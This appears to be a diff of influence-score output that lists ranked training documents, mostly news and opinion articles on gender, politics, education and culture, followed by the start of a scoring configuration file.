vaccine.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 87; Score = 387072.0 +<|begin_of_text|>Ed Smith, 16, Daisy Abraham, 16, and Rose MacKenzie, 15, pictured in the new gender-neutral toilets. + +For a transgender teenager, something as simple as going to the loo at school can be a huge stress. + +So two Wellington schools are leading a dunny revolution: fitting gender-neutral bathrooms for students who feel uncomfortable using'male' or 'female' bathrooms. + +Wellington High School has transformed its level 4 boys' bathroom into, well, just a bathroom. + +And Onslow College is soon to follow suit, spending tens of thousands converting an old block of girls' toilets into gender-neutral facilities. + +READ MORE: + +* Farmers stores plan gender neutral changing rooms + +* Gender neutral toilets a sign of the times says Professor + +* Opinion: New Zealand needs gender-neutral loos and changing rooms + +* American school adopts gender-neutral bathrooms + +The schools join a global trend of schools and cities moving towards bathrooms that are not set up specifically for men or women. + +"Some people don't identify with male or female fully, so it's hard for those people not feeling they can go into one of those bathrooms," said Wellington High School student Rose MacKenzie. + +The 15-year-old said she had sometimes avoided using bathrooms in public, not knowing which to choose + +"If I go into one I know I'll be told this is the female bathroom, but if I go into the other I might receive threats because of, you know, what I look like," she said. + +MacKenzie is a member of Wellington High's UltraViolet club, representing LGBTQI+ students, which - led by student Ed Smith, 16 - raised the issue with the school board. + +Deputy principal Andrew Savage said UltraViolet put together a comprehensive proposal on how the urinals could be converted, with sanitary bins put in each cubicle, and the sign outside changed to simply read 'bathroom'. + +"The board of trustees listened to what the need was and within a short amount of time it was all done and dusted. It's kind of a boring story, in a good way," he laughed. + +"The sky didn't fall in, there was no Erin Brockovich moment, it was very straight-forward." + +Onslow College is also about to convert one block of girls' toilets into gender-neutral stalls, after its LGBTQI+ group Club Sandwich took the idea to staff. + +"It's all about respecting diversity and meeting the needs of diversity, and I think it is the way to go," principal Peter Leggat said. + +Rainbow +================================================================================ +Rank = 88; Score = 387072.0 +<|begin_of_text|>Four years after the sleeper hit Pyaar Ka Punchnama detailed the travails of three harried men and their harridan women, writer and director Luv Ranjan is back with a new set of adventures about three harried men and their harridan women. + +Now, as then, three flatmates acquire girlfriends and live to rue the day. Siddharth (Sunny Singh Nijar) becomes butler, driver and handyman to his beloved Supriya (Sonalli Sehgall), who cannot bring herself to tell her family that she loves him. Tarun (Omkar Kapoor) and Kusum (Ishita Sharma) appear to be a perfect match until she starts maxing out his credit cards and interfering with his business plans. Anshul (Karthik Aaryan) adores the flitty Ruchika (Nushrat Bharucha), but she treats him like one of her designer handbags and loves her male BFF more. + +Except for Nijar and Kapoor, all the other actors are repeats from the first film. Anshul and Ruchika were also paired in the original, and though they are new characters here, their many lows and fleeting highs are all too familiar. Pyaar Ka Punchnama 2 could have revisited their relationship, but it would have meant making Ruchika more human and less of a screeching stereotype – not a prospect entertained by this cautionary tale of male emasculation, which doubles up as a call to arms for men in the ongoing battle of the sexes. + +What appears to have changed since 2011 is the budget for sets and costumes. The trio's apartment is a marked upgrade from the crummy digs featured in the first film. Ruchika is straight out of a fashion magazine catalogue and furiously pouts and preens, waves her painted talons about, and has a closet packed with minuscule dresses. When the couples decide to head out on an ill-advised vacation together, they fly to Thailand. The first movie was happy to swell the ranks of Goan tourists. + +Die, women, die! + +The economy might have improved, but the value system remains stuck in a mythical golden past when men dictated the rules of sexual engagement. The screenplay proceeds as a series of sketches and anecdotes. Some of them are funny enough, but each makes the same point as the first film: modern men are treated like dogs by women (a song to this effect is borrowed from part one), +================================================================================ +Rank = 89; Score = 385024.0 +<|begin_of_text|>With demands the American people be shown the bill, Sen. Bernie Sanders (I-Vt.) stood with his Democratic colleagues in the Senate on Monday night to "hold the floor" as a way to draw attention to Republicans efforts to rush through their Trumpcare legislation under cover of darkness. + +Critics of the Republicans say their repeal and replace bill is nothing more than a massive tax break for the wealthy that would also strip healthcare coverage from millions of Americans while making it worse for nearly everyone. + +As Sanders tweeted: "The truth is that this is not a 'health care' bill. This is a 'tax breaks for the rich and multinational corporations' bill." And: "This health care bill will impact millions and millions of Americans. Yet we have not had one hearing. Republicans should be embarrassed." + +Outside groups like MoveOn.org, Indivisible, and Planned Parenthood Action have all been rallying against the Republican plan and urging Democrats to escalate their opposition. + +"Congress wants to take away our health care—we can't let it happen," said Planned Parenthood Action in a message to its members on Monday. And Indivisible tweeted: "By shutting down the Senate, @ SenateDems are drawing more attention to the secrecy and speed with which the GOP's # TrumpCare is moving." + +From MoveOn.org: + +SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts + +"What are you afraid of?" Sanders asked Senate Republicans during his remarks on the floor late Monday night. "Healthcare constitutes one-sixth of the U.S. economy. It impacts every man, woman, and child in our nation and yet we have thirteen Republicans—all men—working behind closed doors to produce legislation that will be brought to the United States Senate at the last moment so the American people won't know the disaster that it is." + +Senate Minority Leader Chuck Schumer (D-NY) said Monday it was obvious that "Republicans are writing their healthcare bill under the cover of darkness because they are ashamed of it." + +During his remarks from the Senate floor Monday night, Schumer challenged Senator Majority Leader Mitch McConnell to reconsider efforts to rush the bill towards a vote ahead of the upcoming July 4th recess. If Republicans refuse to relent, however, Schumer said Democrats would do everything in their power to hinder McConnell's "dark" and "hidden" process. + +"This radical departure from normal procedure on a bill of such consequence leaves the Senate minority little choice but to depart from normal procedure as well," Schumer said. +================================================================================ +Rank = 90; Score = 380928.0 +<|begin_of_text|>Looking for news you can trust? + +Subscribe to our free newsletters. + +Read an updated version of this article here. + +The National Rifle Association claims to speak for more than 4 million gun owners. But the shots are really called by a hush-hush group of 76 directors. The majority are nominated via a top-down process and elected by a small fraction of NRA members. A breakdown of the current board, based on their official bios: + +87 percent are men. 93 percent are white. + +25 percent are current or former federal, state, or local lawmakers or officials. + +22 percent are current or former law enforcement officers. 30 percent are current or former members of the military. + +24 percent are lawyers. + +12 percent are entertainers or athletes. + +64 percent are hunters. 71 percent are sport or competitive shooters. + +At least 71 percent were nominated, endorsed, or selected by the NRA’s Nominating Committee. + +Some notable members of the NRA’s current board of directors: + +More: See a complete list of NRA board members in 2013. + +* Correction: An earlier version incorrectly stated that Carl T. Rowan Jr. is currently employed by Securitas, based on his bio on the NRA site. Securitas told Mother Jones that it no longer employs him. + +Members of the NRA board of directors in 2013 + +Joe M. Allbaugh + +William H. Allen + +Dr. Thomas P. Arvas + +Scott L. Bach + +William A. Bachenberg + +Frank E. Bachhuber Jr. + +M. Carol Bambery + +Bob Barr + +Ronnie G. Barrett + +Clel Baudler + +David E. Bennett + +J. Kenneth Blackwell + +Matt Blunt + +Dan Boren + +Robert K. Brown + +Pete Brownell + +Dave Butz + +J. William “Bill” Carter + +Ted W. Carter + +Richard Childress + +Patricia A. Clark + +Allan D. Cors + +Charles L. Cotton, + +David G. Coy + +Larry E. Craig John L. Cushman + +William H. Dailey + +Joseph P. Debergalis Jr. + +R. Lee “The Gunny” Ermey + +Edie P. Fleeman + +Joel Friedman + +Sandra S. Froman + +Tom Gaines + +James S. Gilmore III + +Marion P. Hammer + +Maria Heil + +Graham Hill + +Stephen D. Hornady + +Susan Howard + +Roy Innis + +H. Joaquin Jackson + +Curtis S. Jenkins + +David A. +================================================================================ +Rank = 91; Score = 380928.0 +<|begin_of_text|>*Correction appended + +In lieutenant governor candidate Dan Patrick’s self portrait, he is a Christian first, a conservative second and a Republican third. The one notable descriptive omission is the geographic boundary that binds the Texas electorate: “Texan.” Despite what often feels like a statewide embrace of “Texas exceptionalism,” many here appear to eschew what others practically deem a birthright: the ability to call oneself a Texan. If polling data is any indication, the proportion of Texas voters who view themselves as Texans is smaller than one might think, but is likely to grow in the coming decades. + +In the February 2014 University of Texas/Texas Tribune Poll, we asked respondents whether they considered themselves Texans first and Americans second, or Americans first and Texans second. Overall, just over a quarter of registered voters — 27 percent — considered themselves to be Texans first. + +Democrats and liberals overwhelmingly identify as Americans before they identify as Texans (84 percent and 92 percent respectively), and while majorities of Republicans and conservatives identify as Americans first, significant proportions (35 percent and 36 percent respectively) identify first as Texans. This difference is a probable reflection of the current Republican statewide dominance and, in turn, each voter’s willingness to identify with the state. + +The Texas Tribune thanks its sponsors. Become one. + +The Texas-first crowd also includes more men than women. While 32 percent of men describe themselves as Texans first, only 23 percent of women make the same choice. + +Looking to the future, it’s possible that those identifying as Texans will grow. The members of the racial/ethnic group most likely to describe themselves as Texans first are not, in fact, Anglos, among whom 27 percent describe themselves as Texans, but are instead the growing population of Hispanics, among whom 33 percent identify as Texan first. + +Maybe even more surprising, younger voters are more inclined to call themselves Texans first. A slight majority of those who identify as Texans first are between the ages of 18 and 44 years old. Among 18- to 29-year-olds, 40 percent identify as Texans before they identify as Americans, far outpacing any other age group. It’s not grandpa that places the Lone Star over the Stars and Stripes, but his grandchildren. + +Texas already has a regular front-row seat in the fight over federal-state power, and Texans generally consider their government to be a model for other states to follow. While it might be convenient to believe that the most Texan people in Texas are distributed around the VA halls, +================================================================================ +Rank = 92; Score = 380928.0 +<|begin_of_text|>Every year, hundreds of word lovers arrive from across the US to compete in the American Crossword Puzzle tournament. They solve clues (e.g. “caught some Z’s”) and place the answers (e.g. “slept”) in a grid. Meanwhile, a separate group of wordsmiths gather regularly to compete at Scrabble, the game that involves forming words out of letter tiles and finding a suitable place for them on the board. + +Both sets of players have exceptional abilities, but how exactly do they differ from each other and from non-players of matched academic ability? Some answers are provided by Michael Toma and his colleagues, who have performed the first detailed comparison of the mental skills of the most elite crossword and Scrabble players in the US. Previous studies on gaming expertise have mostly involved chess players, so this is a refreshing new research angle. + +Toma’s team recruited 26 elite Scrabble players (in the top two per cent of competitive players, on average; 20 men) and 31 elite crossword players (in the top 7 per cent, on average; 22 men) to complete several tests of working memory – the kind of memory that we use to juggle and use information over short time-scales. + +For example, there was a visuospatial task that involved judging whether images were symmetrical, while also remembering highlighted locations in a series of grids that always appeared after each symmetry image. Another challenge was the reading span task (a test of verbal working memory), which involved judging the grammatical sense of sentences, while also remembering the order of individual letters that were flashed on-screen after each grammatical challenge. + +The researchers anticipated that the Scrabble players would outperform the crossworders on visuospatial working memory, whereas they thought the crossword players might be superior on verbal working memory. These predictions were based on the contrasting skills demanded by the two games. Scrabble players often spend hours learning lists of words that are legal in the game, but unlike crossword players, they don’t need to know their meaning. In fact many Scrabble players admit to not knowing the meaning of many of the words they play. On the other hand, Scrabble players need skills to rearrange letters and to find a place for their words on the board (a visuospatial skill), whereas crossword players do not need these skills so much because the grid is prearranged for them. + +The researchers actually uncovered no group differences on any of the measures of visuospatial and verbal working memory. However, in line with predictions +================================================================================ +Rank = 93; Score = 380928.0 +<|begin_of_text|>For all his grandiose writing about the way things work, Aaron Sorkin has managed to avoid some unpleasant truths despite the many, many efforts made to educate him over the years. But he understands now. + +Variety reports that Sorkin appeared on a panel Saturday at the Writers Guild Festival, moderated by film critic Elvis Mitchell. It appears he was astounded by the notion that white men receive more second chances when they make just so-so movies, when women and minorities find it difficult to even make that first film: + +“Are you saying that women and minorities have a more difficult time getting their stuff read than white men and you’re also saying that [white men] get to make mediocre movies and can continue on?” he asked the audience. + +Throughout the discussion Sorkin returned to this baffling notion, though he insisted that Hollywood is a meritocracy and that he has been unaware of any diversity issue. “You’re saying that if you are a woman or a person of color, you have to hit it out of the park in order to get another chance?” Sorkin demanded, perhaps hoping everyone would see he was speaking truth to power. + +Mitchell apparently joked that Sorkin was making the common mistake of confusing “meritocracy with meretricious,” but to no avail. Sorkin was quick to remind everyone that Lena Dunham and Jordan Peele exist. There’s no report of how Sorkin came around, but he eventually offered to “help” with the diversity issues he just sort of agreed to acknowledge: + +“What can I do [to help]?” Sorkin said. “I do want to understand what someone like me can do … but my thing has always been: ‘If you write it, they will come.’” + +Advertisement + +Ah, the Field of Dreams diversity initiative.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 380928.0 +<|begin_of_text|>The storage facility of prohibited items collected at Newark Liberty International Airport (Photo by Katherine Frey/The Washington Post) + +CJ Ciaramella is a reporter at the Washington Free Beacon and a contributor to Vice. + +If the past 10 years have taught us anything, it’s that, one way or another, the TSA is going to get at your crotch. The latest data point comes from Denver, courtesy of CBS4: + +A CBS4 investigation has learned that two Transportation Security Administration screeners at Denver International Airport have been fired after they were discovered manipulating passenger screening systems to allow a male TSA employee to fondle the genital areas of attractive male passengers. + +Apparently, the two screeners, one male and the other female, worked out a system. The female screener operating the body scanner would misidentify attractive men as women on the scanner, so that the machine would flag the extra, uh, bulk in their groin area, which then initiated a pat-down from her partner in lechery. + +I once had a similar experience at a TSA checkpoint. I had thoroughly emptied my pockets, but the body scanner nevertheless detected an object in my pants. Fortunately, my TSA agent did not appear to take any pleasure in the business and went about his duty with grim professionalism. + +At the time, I was merely annoyed at the inconvenience, not to mention the poor performance of the taxpayer-funded $170,000 millimeter wave scanner that I had assumed was able to tell the difference between a brick of C-4 and genitals. It turns out those scanners have never stopped a terrorist, but maybe one day the TSA screeners will inadvertently catch a cute jihadist. + +It’s a sign of just how resigned we’ve become to the TSA’s existence that most of the men getting felt up probably shrugged it off and thought, “Well, that’s the TSA for you.” We’ve become desensitized to being scanned and prodded and told our toothpaste is too large and must therefore be confiscated in the name of national security. TSA’s expansion of its PreCheck program and an announcement that it would stop searching black women’s hair for weapons are what pass for progress. + +This is a raw deal. The federal government heaped a mountain of farcical security measures on the American public after 9/11, and now we’re supposed to give them a thumbs up for no longer taking nude photos of us and stealing pregnant ladies’ insulin. + +Mind you, this is an agency that regularly employs kleptos and perverts, an agency that handed out security badges to +================================================================================ +Rank = 95; Score = 378880.0 +<|begin_of_text|>Teacher positions in Hawaii’s public schools are filled by fewer certified teachers this year than last, according to numbers released Tuesday by the Hawaii Department of Education. + +The latest figures show that while the number of instructors who’ve fulfilled a state-approved teacher education program is slightly up this year, the percentage of certified teachers in relation to total teaching positions statewide fell slightly to 92 percent from 93 percent the year before. + +Out of the total 13,320 teaching positions as of October, 12,309 positions by the start of this school year were filled by certified teachers. That means 1,011 positions in Hawaii schools statewide are being filled by emergency hires or long-term substitutes. + +Last school year, 12,268 certified teachers filled a total 13,188 positions, meaning there were 920 positions occupied by emergency hires or long-term subs. + +The latest figures reflect a bit of a setback for Hawaii education officials, who have long been contending with a teacher shortage in the state in addition to weak retention levels as measured at the five-year mark. + +Cory Lum/Civil Beat + +Hawaii’s Department of Education wants to fill 96 percent of its teacher positions with certified teachers by 2020 as part of its long-range strategic plan. The number of certified teachers in place by the start of each school year is one of 14 indicators of student success outlined in that plan. + +The figures were presented to the Hawaii Board of Education by DOE administrators, relying on a new data tool that further breaks out these figures by the 15 complex areas statewide. + +The percentage of certified teachers ranges widely across the state — only 84 percent of teachers in the Nanakuli-Waianae complex are certified, for instance, compared with 96 percent in Hilo-Waiakea on Big Island. + +Certified teachers in Hawaii must have at least a bachelor’s degree and have completed a state-approved teacher training program plus other requirements. + +Education officials also released the number of qualified instructors in special education classrooms. Out of the 2,151 special ed teaching positions this year, 1,840 are filled by certified instructors, meaning 311 spots, or 14 percent of the total positions, are occupied by those not trained in this area. + +That percentage is about level with last year’s numbers, but disparities across each complex area are much starker. In Nanakuli-Waianae, for instance, only 73 percent of special education teachers in that region are certified. + +When it comes to teacher retention at the five-year mark, 54 percent +================================================================================ +Rank = 96; Score = 378880.0 +<|begin_of_text|>i once spoke to a roomful of teenagers on priorities. i shared this story (which i believe originated with stephen covey): + +a university professor was addressing his new group of business students and, to drive home a point, used an illustration those students will never forget. as he stood in front of the group of high-powered overachievers he said, “okay, time for a quiz” and he pulled out a one-gallon, mason jar and set it on the table in front of him. he also produced about a dozen fist-sized rocks and carefully placed them, one at a time, into the jar. + +when the jar was filled to the top and no more rocks would fit inside, he asked, “is this jar full?” + +everyone in the class yelled, “yes.” + +the professor replied with a little smile, “really?” + +he reached under the table and pulled out a bucket of gravel. he dumped some gravel in and shook the jar causing pieces of gravel to work themselves down into the spaces between the big rocks. then, he asked the group once more, “is the jar full?” + +by this time the class was on to him. “probably not,” one of them answered. + +“good!” he replied. he reached under the table and brought out a bucket of sand. he started dumping the sand in the jar and it went into all of the spaces left between the rocks and the gravel. once more he asked the question, “is this jar full?” + +“no!” the class shouted. this time, he said, “well done.” then he grabbed a pitcher of water and began to pour it in until the jar was filled to the brim. then he looked at the class and asked, “can anyone tell me the point of this illustration?” + +one student in the front row raised his hand and said, “the point is, no matter how full your schedule is, if you try really hard you can always fit some more things in it!” + +“no,” the speaker replied, “that’s not the point.” the truth this illustration teaches us is: if you don’t put the big rocks in first, you’ll never get them in at all. + +what then, are the ‘big rocks’ in your life? since becoming minimalist, we have been able to identify the big rocks in our lives — our kids, our friends, our faith, our goals, and our influence. becoming minimalist is about identifying the big rocks, putting them in the jar, and intentionally eliminating the little rocks. + +related +================================================================================ +Rank = 97; Score = 376832.0 +<|begin_of_text|>Sex discrimination commissioner says lack of women in Parliament impacts on major issues facing women + +Updated + +Sex discrimination commissioner Elizabeth Broderick says the lack of women in Parliament has a direct impact on major issues affecting women. + +Speaking on International Women's Day, Ms Broderick says she supports any measure that would boost the number of women in Parliament. + +"We absolutely need power to be shared in the Parliament between men and women," she told ABC local radio. + +"There is an assumption well-educated Australian women will just trickle into positions of power. We know it's not true. + +"What we do still need is some active intervention." + +Her comments come after Liberal Party backbencher Sharman Stone said the party should introduce mandatory quotas to boost the number of women in Parliament. + +Prime Minister Tony Abbott has been criticised for only having one woman in his Cabinet, Foreign Minister Julie Bishop. + +The Labor Party has long had a quota system in place but is yet to achieve its target of women in 40 per cent of seats. + +Dr Stone has suggested the Liberals look to Labor for ideas about how to get women into politics. + +"We've got to be, I think, much more structured about making sure women come through," Dr Stone said. + +"I don't care about that 'tokenism' label; bring it on if you must." + +Women should have greater role in Parliament: Broderick + +According to Ms Broderick, women make up just one third of Australian parliamentarians. + +"I think it's important that women's voices are heard at the highest level," she said. + +She says the lack of women in Parliament has a direct impact on issues such as domestic violence, working conditions for women, their leadership roles and pay equality. + +Ms Broderick is calling on men to use their power to help achieve gender equality in Australia. + +She says that while progress was achieved last year in a number of areas, more men need to advocate for women's rights. + +"Power in a country like Australia, in fact any country in the world, largely sits in the hands of men," she said. + +"And if we want to create change, we need good, decent men taking the message of gender equality to other men. + +"That's what's going to create change in countries." + +Men stepping up support but more advocacy needed + +The sex discrimination commissioner says men have stepped up their support in recent times but more advocacy is needed. + +"I think the real shift we saw in the last year was we had more men getting on board, stepping up and being prepared to do some strong advocacy around gender equality and that +================================================================================ +Rank = 98; Score = 376832.0 +<|begin_of_text|>Pundits who say that Donald Trump supporters are all old men have clearly never met Weston Imer. Even though he’s not yet old enough to drink, vote, drive, or shave for that matter; he’s running the Republican nominee’s new campaign office in Colorado. + +Imer’s mother is running the campaign field office in Jefferson County, Colorado, which includes the suburbs of Denver, and her 12-year-old son became such a big supporter of “The Donald” that he quickly became as active as his mom. + +Weston is the co-chair for the Jefferson County campaign and is working to coordinate volunteers and get-out-the-vote efforts in the region. + +Like so many other young Trump supporters, Imer was bullied in school for supporting the billionaire, but rather than shying away from politics he doubled down. + +In an interview with KMOV 4, Imer said that he hopes to launch his own career in politics and maybe even have his own run for the presidency one day. + +“Definitely, 2040, watch for me,” the 12-year-old told KMOV 4 on Sunday. “And Barron Trump if you’re watching, in 2040 I’ll take you as my running mate.” + +Imer’s mom said that she hopes other parents see her son and decide to get their own children more educated and active in politics, regardless of party affiliation. + +Watch the full clip below: + +KMOV.com<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 99; Score = 376832.0 +<|begin_of_text|>This weekend's Denver ComicCon came under fire when attendees discovered that a Women in Comics panel had only male panelists. While a representative of DCC has defended the panel as "not about current women creators or anything to do with industry bias," it seems odd that a convention with Trina Robbins, the eminent historian of women as creators and characters, as a guest would not invite her to join in on a discussion of the history of women in comics. While the misstep here is primarily on the panel organizers, it also raises a question of what obligation conventions have to moderate and comment on panels that are accepted. + +Convention attendee Christy had this to say about what occurred at the panel: + +Christy's last point is an important one --- if these guys are experts, as posited below, how could they possibly not know any women in comics to speak on this panel? Jason Jansky of DStreet PR responded to my email to Denver ComicCon to offer this statement: + +In regards to the Women in Comics panel, I think it’s important to point out that it was a panel that took an historical view of women characters in comic books rather than the current role of women creators in the industry or diversity in comics --- of which DCC has many with appropriately diverse panels. The Women in Comics panel was a submitted panel that featured respected academics on the subject. A reading of the panel description indicates that the panel was not about current women creators or anything to do with industry bias. “With the female interest in comics increasing lately, this panel discusses many of the popular female characters from the beginning of the superhero mid 1930s comics. Also a focus on some of the women that were able to break in the mostly all male club of creating comics during that time. Includes an introduction to many of the female illustrators/creators attending the convention. Kevin Robinette --- Instructor Academy Art University of San Francisco, History of American Comics, Craig Glassen --- Art Instructor, Denver area schools, Jason H. Tucker --- The Way Interactive graphic novel app.” + +There are a lot of problems to unpack here, with probably the worst being that a convention representative thinks it's okay to have only men speaking for and about women simply because a panel wasn't about current women in comics, diversity, or bias. And even the former part of that is clearly incorrect, given that part of the panel description is that it would introduce attendees to women attending the convention. + +The statement that the panel featured "respected academics on the subject" is also a huge problem, diff --git a/examples/openwebtext/files/scores_raw_margin/score_arguments.json b/examples/openwebtext/files/scores_raw_margin/score_arguments.json new file mode 100644 index 0000000..a8df9ab --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/score_arguments.json @@ -0,0 +1,19 @@ +{ + "damping_factor": null, + "amp_dtype": "torch.bfloat16", + "offload_activations_to_cpu": true, + "data_partitions": 1, + "module_partitions": 1, + "compute_per_module_scores": false, + "compute_per_token_scores": false, + "query_gradient_accumulation_steps": 10, + "query_gradient_low_rank": 64, + "use_full_svd": true, + "aggregate_query_gradients": false, + 